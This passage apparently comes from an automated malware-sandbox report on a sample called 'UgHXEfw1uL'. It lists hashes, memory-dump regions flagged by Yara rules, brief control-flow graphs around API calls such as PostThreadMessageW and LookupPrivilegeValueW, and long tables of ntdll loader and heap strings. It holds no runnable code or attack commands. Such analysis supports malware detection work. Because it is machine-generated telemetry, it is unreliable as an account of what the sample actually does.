                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 281632a2f927b4ca554958e92b8dce1ca72b05e3b791daa7af053c455024cc66
                                          • Instruction ID: 93e70c8ffee2d561de7eac3ff201355cfd34bfb817f10b4ad791e5409a7180ac
                                          • Opcode Fuzzy Hash: 281632a2f927b4ca554958e92b8dce1ca72b05e3b791daa7af053c455024cc66
                                          • Instruction Fuzzy Hash: 3D900225251400131205B5584708507004687D5391355C033F1055550DDA2589626122
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 98340e807bd565155251c83139248a8168ac70db1b5ef3ac743e282a28ce5c3a
                                          • Instruction ID: bf1c8f6a241f2e9b0d293739941b17760972a386bca5d56ca97d850320455340
                                          • Opcode Fuzzy Hash: 98340e807bd565155251c83139248a8168ac70db1b5ef3ac743e282a28ce5c3a
                                          • Instruction Fuzzy Hash: AE90023124140812E2807158840864A000587D1341F95C037A0065654ECE198B5A77A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5452b824174745ed3df9c6f5d39a7b9f4c40ef95bb15c0f72a064d733aeb8e6e
                                          • Instruction ID: ca2b51e8be75aa6aa9ac3ca303d9967ac782de27cdc6eba758fa0199c8571047
                                          • Opcode Fuzzy Hash: 5452b824174745ed3df9c6f5d39a7b9f4c40ef95bb15c0f72a064d733aeb8e6e
                                          • Instruction Fuzzy Hash: E490026124240013520571588418616400A87E0341B55C033E1054590EC92989927126
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 965f9645d7ff8c66aaee2eda09df9bbcae1b469471636f0a498ae1ab293331f3
                                          • Instruction ID: 13a58f6e5183360f532e2b4a6c0bdc1eccd561a9b81230311e4348f44f9f2208
                                          • Opcode Fuzzy Hash: 965f9645d7ff8c66aaee2eda09df9bbcae1b469471636f0a498ae1ab293331f3
                                          • Instruction Fuzzy Hash: 5890023124140412E2007598940C646000587E0341F55D033A5064555FCA6989927132
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 0ebffb57aaa6b640ba3380b5a29c1233b2ba5068aceb5f4be65d38a07b51c9ed
                                          • Instruction ID: 91ae6f459ce4739a81defcc8a54511ffff13000f16931655db04e959ffd34b20
                                          • Opcode Fuzzy Hash: 0ebffb57aaa6b640ba3380b5a29c1233b2ba5068aceb5f4be65d38a07b51c9ed
                                          • Instruction Fuzzy Hash: F790023124148812E2107158C40874A000587D0341F59C433A4464658E8A9989927122
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 038a4add2bbf4409a0bde6e7631bcc886d1f4cd5b4a8ccb0bc6a87db12727333
                                          • Instruction ID: 286c91b374c4acc1743f07b80c5faaa198a5cb20f613d4ea1038a2b21997effc
                                          • Opcode Fuzzy Hash: 038a4add2bbf4409a0bde6e7631bcc886d1f4cd5b4a8ccb0bc6a87db12727333
                                          • Instruction Fuzzy Hash: 1990023124140423E21171588508707000987D0381F95C433A0464558E9A5A8A53B122
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 14 41a630-41a661 call 41af60 RtlAllocateHeap
                                          APIs
                                          • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID: 6EA
                                          • API String ID: 1279760036-1400015478
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 212 408308-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 221 40835c-40836e PostThreadMessageW 212->221 222 40838e-408392 212->222 223 408370-40838a call 40a480 221->223 224 40838d 221->224 223->224 224->222
                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 227 408310-40831f 228 408328-40835a call 41ca00 call 40acf0 call 414e50 227->228 229 408323 call 41be60 227->229 236 40835c-40836e PostThreadMessageW 228->236 237 40838e-408392 228->237 229->228 238 408370-40838a call 40a480 236->238 239 40838d 236->239 238->239 239->237
                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 260 41a5f6-41a5f7 261 41a667-41a6d8 call 41af60 ExitProcess 260->261 262 41a5f9-41a62d call 41af60 260->262
                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 275 41a6a3-41a6ae 277 41a6b0-41a6b6 275->277 278 41a6b8-41a6c9 275->278 277->278 279 41a6cf-41a6d8 ExitProcess 278->279 280 41a6ca call 41af60 278->280 280->279
                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 281 41a670-41a6a1 call 41af60 RtlFreeHeap
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2160512332
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Thread identifier, xrefs: 00F9553A
                                          • Invalid debug info address of this critical section, xrefs: 00F954B6
                                          • double initialized or corrupted critical section, xrefs: 00F95508
                                          • corrupted critical section, xrefs: 00F954C2
                                          • 8, xrefs: 00F952E3
                                          • Critical section debug info address, xrefs: 00F9541F, 00F9552E
                                          • Critical section address., xrefs: 00F95502
                                          • Thread is in a state in which it cannot own a critical section, xrefs: 00F95543
                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00F954E2
                                          • undeleted critical section in freed memory, xrefs: 00F9542B
                                          • Critical section address, xrefs: 00F95425, 00F954BC, 00F95534
                                          • Address of the debug info found in the active list., xrefs: 00F954AE, 00F954FA
                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00F954CE
                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00F9540A, 00F95496, 00F95519
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                          • API String ID: 0-2368682639
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00F92506
                                          • @, xrefs: 00F9259B
                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00F92498
                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00F92412
                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00F92409
                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00F925EB
                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00F922E4
                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00F924C0
                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 00F9261F
                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00F92624
                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00F92602
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                          • API String ID: 0-4009184096
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                          • API String ID: 0-2515994595
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                          • API String ID: 0-1357697941
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 0-1700792311
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T$`V${
                                          • API String ID: 0-2184846227
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 00FA8A3D
                                          • AVRF: -*- final list of providers -*- , xrefs: 00FA8B8F
                                          • VerifierDebug, xrefs: 00FA8CA5
                                          • HandleTraces, xrefs: 00FA8C8F
                                          • VerifierFlags, xrefs: 00FA8C50
                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 00FA8A67
                                          • VerifierDlls, xrefs: 00FA8CBD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                          • API String ID: 0-3223716464
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-792281065
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 00F9279C
                                          • .Local\, xrefs: 00F52D91
                                          • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 00F92706
                                          • \WinSxS\, xrefs: 00F52E23
                                          • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 00F9276F
                                          • @, xrefs: 00F52E4D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                          • API String ID: 0-3926108909
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00F799ED
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00F79A11, 00F79A3A
                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 00F79A01
                                          • LdrpInitShimEngine, xrefs: 00F799F4, 00F79A07, 00F79A30
                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00F79A2A
                                          • apphelp.dll, xrefs: 00F16496
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-204845295
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00F5C6C3
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 00F981E5
                                          • Loading import redirection DLL: '%wZ', xrefs: 00F98170
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 00F98181, 00F981F5
                                          • LdrpInitializeProcess, xrefs: 00F5C6C4
                                          • LdrpInitializeImportRedirection, xrefs: 00F98177, 00F981EB
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00F921BF
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00F9219F
